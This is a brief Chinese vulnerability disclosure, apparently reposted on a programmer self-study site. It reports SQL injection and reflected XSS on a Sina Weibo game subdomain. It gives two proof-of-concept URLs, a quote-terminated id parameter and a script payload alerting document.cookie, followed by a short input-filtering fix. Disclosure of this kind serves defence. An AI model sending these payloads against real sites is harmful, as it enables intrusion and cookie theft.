新浪微博子栏目存在参数验证/过滤不严,导致的xss和sql inject。 sql inject: http://game.weibo测试数据/mobile/index/topic?id=2' xss: http://game.weibo测试数据/mobile/detail/8888888%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C!-- 漏洞 证明:
修复方案: 严格过滤输入的参数,对数字进行int化,字符串限制特殊字符、转椅危险字符
查看更多关于新浪微博子栏目漏洞可获取数据和cookie - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13643